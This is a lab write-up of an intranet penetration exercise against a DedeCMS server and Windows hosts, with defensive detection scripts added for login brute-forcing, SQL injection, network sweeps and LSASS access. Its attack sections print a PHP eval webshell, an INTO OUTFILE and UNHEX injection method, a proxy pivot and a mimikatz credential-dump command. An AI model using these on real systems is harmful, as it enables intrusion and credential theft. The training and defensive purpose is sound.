【Experiment description】
The task of this experiment is to penetrate hosts on the intranet through a proxy set up on a host that is reachable from the external network. During the penetration it is generally necessary first to scan ports to infer which services the host runs, then to confirm that a vulnerability exists with vulnerability scripts and other scanning tools, and finally to exploit it to compromise the host and obtain privileges.
In this experiment you need to find strings of the form flag{<32-character MD5>} as the credential for completing each task, and submit the flags in the form.
Gain privileges on the target machine through a website or system vulnerability.
After gaining control of the server, use it as a pivot to move into the intranet.
【Purpose of experiment】
Brute-force the website backend login, enter the backend and upload a webshell.
Obtain a webshell through a SQL injection vulnerability.
Write a webshell through phpMyAdmin.
Scan the intranet through a proxy.
Log in to intranet machines with a password obtained from the database.
Dump the domain controller account and password and log in to the domain controller.
【Experimental Environment】
Operating System | IP Address | Server Role | Login Account / Password
---|---|---|---
Windows 7 | 192.168.1.200 | Operator machine | Username: administrator; Password: Simplexue123
CentOS 7 | 192.168.1.10 | Target machine | Username: root; Password: Simplexue123
Windows 2012 | 192.168.2.10 | Target machine | Username: administrator; Password: Simplexue123
Windows 2012 | 192.168.2.11 | Target machine | Username: administrator; Password: Simplexue123
Task 1: Backend file upload
First, use nmap to scan the target IPs provided by the experiment platform (192.168.1.10, 192.168.2.10 and 192.168.2.11), check which common ports are open, and look for web services. The scan results show that the target machine 192.168.1.10 (CentOS 7) has an HTTP service on port 80; open it in a browser to view the web page.
The web page is confirmed to exist. Next, use wwwscan to scan the website's directories; it finds two backend login paths, /manager/login.php and /member/login.php.
Use Burp Suite to brute-force /manager/login.php. Configure the browser to use Burp Suite's proxy, enable interception, and send the captured login POST request to the Intruder tool for the attack. Since neither the username nor the password is known, use Cluster Bomb mode, which combines a list of common usernames (admin, administrator, root, and so on) with common passwords taken from the password files supplied with the platform.
In the screenshot above, the userid position is loaded with admin, administrator and root (including capitalised variants), and the pwd position is loaded with the 1000-entry common-password file that ships with the platform.
When the attack finishes, sort the results by response length and analyse them: the correct username/password combination stands out by its different response length. A login cookie is set only for the username admin (case-insensitive) with the password 1q2w3e4r, so this is the correct combination. Now turn the proxy off, log in to the website management backend, and read flag1{5d41402abc4b2a76b9719d911017c592} from it.
Then use the file manager under Attachment Management -> File Upload to upload the one-line PHP trojan shell.php from the tools folder; note that the current directory here is /uploads.
Connect to the webshell with the China Chopper (菜刀, "kitchen knife") tool: the connection succeeds and webshell access is obtained.
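From the defender's side, the Intruder run above leaves an unmistakable trace in the web server's access log: many POST requests to /manager/login.php from one client in a short time, with one response whose length differs from the rest. The following Python script is an added example (not part of this writeup or of the lab platform) that flags such bursts in combined-format access logs; the log lines, client addresses and threshold are constructed for the demonstration.

```python
"""Detection of a login brute-force like the Burp Intruder run in Task 1, seen from
the web server's side. Added example, not part of the writeup; the access-log lines
are constructed in combined log format and do not come from the lab."""
import re
from collections import Counter, defaultdict
from datetime import datetime, timedelta

# Apache/Nginx "combined" format: ip ident user [time] "method path proto" status size ...
LOG_RE = re.compile(
    r'(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+)[^"]*" '
    r'(?P<status>\d{3}) (?P<size>\d+|-)'
)
TS_FMT = "%d/%b/%Y:%H:%M:%S %z"


def parse_line(line):
    """Return a dict for one access-log line, or None if it does not match."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["ts"] = datetime.strptime(rec["ts"], TS_FMT)
    rec["status"] = int(rec["status"])
    rec["size"] = 0 if rec["size"] == "-" else int(rec["size"])
    return rec


def detect_bruteforce(lines, login_path="/manager/login.php",
                      threshold=10, window=timedelta(minutes=1)):
    """Flag client IPs that POST to login_path more than `threshold` times inside
    any sliding `window`. For each flagged IP also report response sizes that occur
    only once in the burst: the Intruder technique in the text picks the success by
    its different response length, and the same outlier is visible to the defender."""
    per_ip = defaultdict(list)
    for line in lines:
        rec = parse_line(line)
        if rec and rec["method"] == "POST" and rec["path"].split("?", 1)[0] == login_path:
            per_ip[rec["ip"]].append((rec["ts"], rec["size"]))

    alerts = {}
    for ip, events in per_ip.items():
        events.sort()
        start, best = 0, None
        for end in range(len(events)):
            while events[end][0] - events[start][0] > window:
                start += 1
            burst = events[start:end + 1]
            if len(burst) > threshold and (best is None or len(burst) > len(best)):
                best = burst
        if best is not None:
            size_counts = Counter(size for _, size in best)
            alerts[ip] = {
                "attempts": len(best),
                "outlier_sizes": sorted(s for s, n in size_counts.items() if n == 1),
            }
    return alerts


def _mk(ip, second, method, path, status, size):
    """Build one constructed combined-format log line."""
    return (f'{ip} - - [10/Mar/2024:10:15:{second:02d} +0000] '
            f'"{method} {path} HTTP/1.1" {status} {size}')


# Constructed sample: one client fires 11 login POSTs in 20 s; ten failures return the
# same 1532-byte page, one succeeds with a redirect and a short body. A second client
# browses normally and logs in once.
SAMPLE_LOG = [_mk("203.0.113.7", s, "POST", "/manager/login.php", 200, 1532)
              for s in range(0, 22, 2)]
SAMPLE_LOG[7] = _mk("203.0.113.7", 14, "POST", "/manager/login.php", 302, 311)
SAMPLE_LOG += [
    _mk("198.51.100.9", 5, "GET", "/index.php", 200, 9021),
    _mk("198.51.100.9", 30, "POST", "/manager/login.php", 302, 311),
]

if __name__ == "__main__":
    for ip, info in detect_bruteforce(SAMPLE_LOG).items():
        print(f"{ip}: {info['attempts']} login POSTs within one minute, "
              f"outlier response sizes {info['outlier_sizes']}")
```

Alerting on the burst is the cheap win; the durable fixes on the application side are rate limiting or lockout on /manager/login.php, refusing credentials of the admin/1q2w3e4r class when the account is created, and not leaving the administration path at a name that a directory scanner such as wwwscan guesses on its first pass.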
Task 2: SQL injection
Looking at the /sql directory, this page displays the SQL statement that the backend builds from the URL query parameters. The default output is as follows.
Try modifying the query parameters: restrict the id value, and also try the userid field used in the login form. It turns out that the backend only parses the id query parameter, but that is enough for SQL injection.
In the previous task, nmap showed that the website uses MySQL. To obtain basic information about the site's database, first determine how many columns this SELECT statement returns. Use an ORDER BY clause to probe the number of columns in the result and so determine the table structure: when the index written exceeds the actual number of columns, the database reports an error such as "Unknown column ...". Starting from 5 and increasing the index step by step, ORDER BY 10 still queries normally, but ORDER BY 11 makes the backend report an error, so the dede_admin table has 10 columns in total.
Now confirm the display positions. The user ID appears in the first column of the table and the account name in the third. Next, build the SQL statement that returns the database user and the database name currently in use.
Now use this vulnerability to upload a webshell. From the previous task we know that the service on port 80 is Apache httpd, and looking up the relevant information shows its configuration file is at /etc/httpd/conf/httpd.conf. Following https://cloud.tencent.com/developer/article/1918345, MySQL's LOAD_FILE() function can be injected to read file contents and retrieve the web server's configuration file. Searching it for DocumentRoot confirms that /var/www/html is the website root directory. A one-line trojan now has to be written into this directory, which MySQL's INTO OUTFILE can do: write the one-line trojan to the web server's root directory. A text file is written to the website root successfully; now replace its content with the most commonly used one-line trojan and write it to the web root as webshell.php:
<?php @eval($_POST['cmd']); ?>
The returned SQL statement shows that < was escaped while > was not, which rules out a character encoding/decoding problem. Putting < into the query parameter again shows that where < should appear, the response body contains ' (a single quotation mark written as an HTML entity), so presumably the backend processing logic replaces every <.
However, MySQL accepts hexadecimal literals for binary data, so the one-line trojan can be converted to its hexadecimal ASCII encoding and written through the UNHEX() function; the payload then contains no < at all and passes the backend's filter before the SQL statement that writes to disk is executed.
Connect with China Chopper again and obtain flag3{fd5d4d5a199e9e8bfadead5f5e52895a}.
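The ORDER BY probe above works only because the id parameter is pasted into the statement as text, and the later observation that the backend strips < but nothing else shows why a character blacklist does not change that. The Python script below is an added example, not from this writeup and not DedeCMS code: it reproduces the probe against a string-built query with that blacklist in place, then shows the parameterised version, against which the same inputs are inert. The in-memory SQLite table is constructed to mirror the ten-column dede_admin layout the text describes; the pwd column and the c4 to c10 filler columns are assumptions.

```python
"""Column-count probing (ORDER BY n until the database errors) against a string-built
query with a '<' blacklist, beside the parameterised form. Added example; the table
is constructed to resemble the ten-column dede_admin described in the writeup."""
import sqlite3


def make_db():
    """Ten columns, id in position 1 and the account name in position 3, as the text found."""
    conn = sqlite3.connect(":memory:")
    extra = ", ".join(f"c{i} TEXT" for i in range(4, 11))  # c4 .. c10: assumed filler columns
    conn.execute(f"CREATE TABLE dede_admin (id INTEGER, pwd TEXT, userid TEXT, {extra})")
    conn.execute("INSERT INTO dede_admin VALUES (1, 'hash', 'admin', "
                 + ", ".join("NULL" for _ in range(7)) + ")")
    return conn


def blacklist_filter(value):
    """What the backend in the writeup appears to do: replace every '<' with an
    HTML-escaped quote. Nothing else in the input is touched."""
    return value.replace("<", "&#039;")


def vulnerable_lookup(conn, user_input):
    """Builds the statement by concatenation after the blacklist. Whatever survives the
    filter becomes SQL, so 'ORDER BY 11' is parsed as a clause and its error reveals
    the column count (SQLite words the error differently from MySQL, the behaviour
    is the same)."""
    sql = "SELECT * FROM dede_admin WHERE id=" + blacklist_filter(user_input)
    try:
        return {"sql": sql, "rows": conn.execute(sql).fetchall(), "error": None}
    except sqlite3.OperationalError as exc:
        return {"sql": sql, "rows": [], "error": str(exc)}


def hardened_lookup(conn, user_input):
    """Validates the type first and binds the value as a parameter, so the input can
    never change the statement's structure; there is nothing left to probe."""
    try:
        id_value = int(user_input)
    except ValueError:
        return {"rows": [], "error": "id must be an integer"}
    rows = conn.execute("SELECT * FROM dede_admin WHERE id=?", (id_value,)).fetchall()
    return {"rows": rows, "error": None}


if __name__ == "__main__":
    db = make_db()
    for probe in ("1", "1 ORDER BY 10", "1 ORDER BY 11"):
        v, h = vulnerable_lookup(db, probe), hardened_lookup(db, probe)
        print(f"{probe!r:18} concat -> rows={len(v['rows'])} error={v['error']!r}")
        print(f"{'':18} bound  -> rows={len(h['rows'])} error={h['error']!r}")
```

The same separation of code from data is what defeats the UNHEX() trick: a bound value is never parsed as SQL, whatever encoding it arrives in. The file-write half of the chain has its own controls, which are independent of the application code: the MySQL account used by the web application should not hold the FILE privilege, secure_file_priv should point at a directory that is not the web root, and the web root should not be writable by the mysqld user. Those three settings also neutralise the phpMyAdmin route in Task 3, where the root/root login is the more basic failure.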
Task 3: Writing a shell through phpMyAdmin
In Task 1, the wwwscan scan also found the phpMyAdmin path.
Trying phpMyAdmin's default username and password, root/root, logs in directly.
SQL statements can be executed from this page to obtain all kinds of information, for example:
SELECT load_file("/etc/httpd/conf/httpd.conf");
This returns the website root directory from DocumentRoot, /var/www/html.
Using phpMyAdmin's SQL execution function, write the one-line trojan to the web root with INTO OUTFILE; shell access is obtained. Meanwhile, searching the website database dedecmsv57utf8sp1 for "flag" finds flag2{912ec803b2ce49e4a541068d495ab570}.
Task 4: Scan the intranet PCs and log in
The web port scan folder contains two files, socks.py and RASscan.py: socks.py provides helper functions and RASscan.py is the main entry point of the intranet scanning script.
Run python RASscan.py 192.168.2.1 192.168.2.255 -t 16 to scan the intranet segment 192.168.2.0/24. This process is surprisingly slow; interact with the desktop periodically during the experiment so that the platform does not reclaim the virtual machine's resources.
The scan finds that the two machines 192.168.2.10 and 192.168.2.11 have port 3389 open and allow remote desktop login. However, these two intranet addresses sit on the same internal network as the web server and cannot be reached directly from the operator machine, so a proxy service has to be started on the server.
Following the experiment platform's hints, upload the reGeorg tool to the web machine to provide the proxy service.
On the client, use Proxifier to route the remote desktop connection to 2.11 (that is, 192.168.2.11) through the proxy; after configuring the proxy, connect to the desktop with RDP.
I found that a password was needed to log in, and thought of looking for one in the server's files or database. Before that, I added a direct rule for firefox.exe in Proxifier.
After exporting the database and searching for the administrator field, a suspected password, topsec.123, is found.
Trying the two scanned machines in turn, 192.168.2.11 accepts this password, and the flag is found on the C drive: flag4{238fb735876083b832229d279b995062}.
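The sweep of 192.168.2.0/24 through the reGeorg tunnel is, on the wire, the web server itself opening connections to dozens of internal addresses on port 3389 within a minute, most of which are refused. The Python script below is an added example (not part of this writeup and not the RASscan.py tool) that detects that pattern in connection records and, separately, flags any server that initiates admin-port connections at all. The CSV records, thresholds and the set of server addresses are constructed; the addresses mirror the lab's so that the output reads against the text.

```python
"""Spotting an intranet sweep (one pivot host probing a whole /24 for RDP) in
connection logs, plus the simpler rule that a web server should not initiate
admin-port connections at all. Added example, not part of the writeup; the CSV
connection records are constructed, not captured from the lab."""
import csv
import io
from collections import defaultdict
from datetime import datetime, timedelta

ADMIN_PORTS = {22, 445, 3389, 5985}  # SSH, SMB, RDP, WinRM


def parse_events(text):
    """Parse 'ts,src,dst,dport,action' records into dicts with typed fields."""
    events = []
    for row in csv.DictReader(io.StringIO(text)):
        row["ts"] = datetime.fromisoformat(row["ts"])
        row["dport"] = int(row["dport"])
        events.append(row)
    return events


def detect_sweeps(events, min_hosts=10, window=timedelta(minutes=2)):
    """For each (src, dport) pair, alert when one source touches at least `min_hosts`
    distinct destinations inside a sliding `window`. Denied connections count too:
    a scan of an address range shows up mostly as denies and timeouts."""
    by_key = defaultdict(list)
    for e in events:
        by_key[(e["src"], e["dport"])].append(e)
    alerts = []
    for (src, dport), evs in by_key.items():
        evs.sort(key=lambda e: e["ts"])
        start, best = 0, None
        for end in range(len(evs)):
            while evs[end]["ts"] - evs[start]["ts"] > window:
                start += 1
            burst = evs[start:end + 1]
            hosts = {e["dst"] for e in burst}
            if len(hosts) >= min_hosts and (best is None or len(hosts) > best["distinct_hosts"]):
                best = {
                    "src": src, "dport": dport, "distinct_hosts": len(hosts),
                    # destinations that accepted: the scanner's "open" findings
                    "responded": sorted({e["dst"] for e in burst if e["action"] == "allow"}),
                }
        if best is not None:
            alerts.append(best)
    return alerts


def pivot_candidates(events, server_addresses):
    """Servers that initiated any connection to an admin port. A DMZ web server has no
    business opening RDP sessions inward, so this rule needs no threshold."""
    return sorted({e["src"] for e in events
                   if e["src"] in server_addresses and e["dport"] in ADMIN_PORTS})


# Constructed sample: the web server probes 192.168.2.1-30 on 3389 within a minute;
# only .10 and .11 accept (the two hosts the writeup found). An operator workstation
# makes one ordinary RDP connection a few minutes later.
SAMPLE_CSV = "ts,src,dst,dport,action\n" + "\n".join(
    f"2024-03-10T10:20:{2 * i:02d},192.168.1.10,192.168.2.{i + 1},3389,"
    f"{'allow' if i + 1 in (10, 11) else 'deny'}"
    for i in range(30)
) + "\n2024-03-10T10:25:00,192.168.1.200,192.168.2.10,3389,allow\n"

if __name__ == "__main__":
    evs = parse_events(SAMPLE_CSV)
    for a in detect_sweeps(evs):
        print(f"sweep: {a['src']} -> {a['distinct_hosts']} hosts on {a['dport']}, "
              f"accepted by {a['responded']}")
    print("servers initiating admin-port connections:",
          pivot_candidates(evs, {"192.168.1.10"}))
```

Egress filtering from the web tier (no connections initiated towards 3389, 445 or 5985 on the internal segment) would have stopped the pivot outright; the sweep rule is the fallback for the day that policy has an exception, and the pivot rule catches a single targeted connection that no threshold would.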
Task 5: Dump the domain controller password and log in to the domain controller
The experiment task requires using mimikatz on the machine reached via remote desktop, 192.168.2.11, to dump passwords.
After connecting to 192.168.2.11 over RDP, share the operator machine's C drive through the RDP session to copy the tools onto the compromised desktop, upload mimikatz and run the sekurlsa::logonpasswords command to obtain the plaintext password Simplexue123.
Reference: mimikatz抓取明文密码 | ssooking's notebook (mimikatz: dumping plaintext passwords).
mimikatz.exe "privilege::debug" "sekurlsa::logonpasswords full"
Use this password to log in to the other intranet host, 192.168.2.10, and obtain flag5{6aa16f9b07f2d00b16b94aa797488b38}.
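Dumping logon passwords with mimikatz, as done on 192.168.2.11 above, requires opening the LSASS process with memory-read access, and Sysmon's ProcessAccess event (Event ID 10) records exactly that. The Python script below is an added example, not from this writeup or from the referenced notebook: it scans constructed Sysmon records for images outside an allowlist that obtained read access to lsass.exe. The event values, host names, user names and the allowlist are invented, and the allowlist must be tuned to the real environment.

```python
"""Detecting an LSASS credential dump from Sysmon Event ID 10 (ProcessAccess)
records: a process that is not a known security or system component opening
lsass.exe with PROCESS_VM_READ. Added example; the events and the allowlist
are constructed."""

PROCESS_VM_READ = 0x0010
PROCESS_QUERY_INFORMATION = 0x0400
PROCESS_QUERY_LIMITED_INFORMATION = 0x1000

# Constructed allowlist of images that legitimately read LSASS memory (defender
# engine, subsystem processes). Match on the full lower-case path, never on the
# file name alone.
ALLOWED_SOURCES = {
    r"c:\windows\system32\csrss.exe",
    r"c:\windows\system32\wininit.exe",
    r"c:\program files\windows defender\msmpeng.exe",
}


def describe_access(mask):
    """Name the rights in a GrantedAccess mask that matter for credential theft."""
    names = []
    if mask & PROCESS_VM_READ:
        names.append("PROCESS_VM_READ")
    if mask & PROCESS_QUERY_INFORMATION:
        names.append("PROCESS_QUERY_INFORMATION")
    if mask & PROCESS_QUERY_LIMITED_INFORMATION:
        names.append("PROCESS_QUERY_LIMITED_INFORMATION")
    return names


def is_suspicious_lsass_access(evt):
    """True for a Sysmon ProcessAccess event in which an unlisted image obtained
    read access to lsass.exe memory. Reading memory is what every LSASS dumper
    needs, so the check keys on PROCESS_VM_READ rather than on one exact mask."""
    if evt.get("EventID") != 10:
        return False
    if not evt.get("TargetImage", "").lower().endswith("\\lsass.exe"):
        return False
    granted = int(evt.get("GrantedAccess", "0x0"), 16)
    if not granted & PROCESS_VM_READ:
        return False
    return evt.get("SourceImage", "").lower() not in ALLOWED_SOURCES


def scan_events(events):
    """Return one alert dict per suspicious event."""
    return [
        {
            "host": e.get("Computer"),
            "source": e["SourceImage"],
            "user": e.get("SourceUser"),
            "rights": describe_access(int(e["GrantedAccess"], 16)),
        }
        for e in events if is_suspicious_lsass_access(e)
    ]


# Constructed Sysmon records: field names follow the Sysmon ProcessAccess schema,
# all values are invented.
SAMPLE_EVENTS = [
    {"EventID": 10, "Computer": "HOST-A",
     "SourceImage": r"C:\Users\operator\Desktop\mimikatz.exe", "SourceUser": r"HOST-A\operator",
     "TargetImage": r"C:\Windows\system32\lsass.exe", "GrantedAccess": "0x1010"},
    {"EventID": 10, "Computer": "HOST-A",
     "SourceImage": r"C:\Program Files\Windows Defender\MsMpEng.exe", "SourceUser": r"NT AUTHORITY\SYSTEM",
     "TargetImage": r"C:\Windows\system32\lsass.exe", "GrantedAccess": "0x1FFFFF"},
    {"EventID": 10, "Computer": "HOST-A",
     "SourceImage": r"C:\Windows\system32\taskmgr.exe", "SourceUser": r"HOST-A\operator",
     "TargetImage": r"C:\Windows\system32\lsass.exe", "GrantedAccess": "0x1000"},  # no VM_READ
    {"EventID": 10, "Computer": "HOST-A",
     "SourceImage": r"C:\Windows\system32\svchost.exe", "SourceUser": r"NT AUTHORITY\SYSTEM",
     "TargetImage": r"C:\Windows\explorer.exe", "GrantedAccess": "0x1010"},  # target is not LSASS
    {"EventID": 1, "Computer": "HOST-A", "Image": r"C:\Users\operator\Desktop\mimikatz.exe"},
]

if __name__ == "__main__":
    for alert in scan_events(SAMPLE_EVENTS):
        print(alert)
```

Detection aside, two conditions in this lab made the dump decisive: WDigest still caching a plaintext copy of the logon password (turned off by setting UseLogonCredential to 0 under HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest, which on Windows Server 2012 requires KB2871997), and the same administrator password Simplexue123 on 192.168.2.10 and 192.168.2.11, so that one dump on a member server opened the domain controller. LSA Protection (RunAsPPL) or Credential Guard blocks the memory read itself; unique per-host administrator passwords (for example via LAPS) limit what a successful read is worth.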
Summary
Through the steps above, this experiment carried out the penetration test of the target hosts step by step, obtained multiple flags, and verified different types of vulnerabilities and attack methods.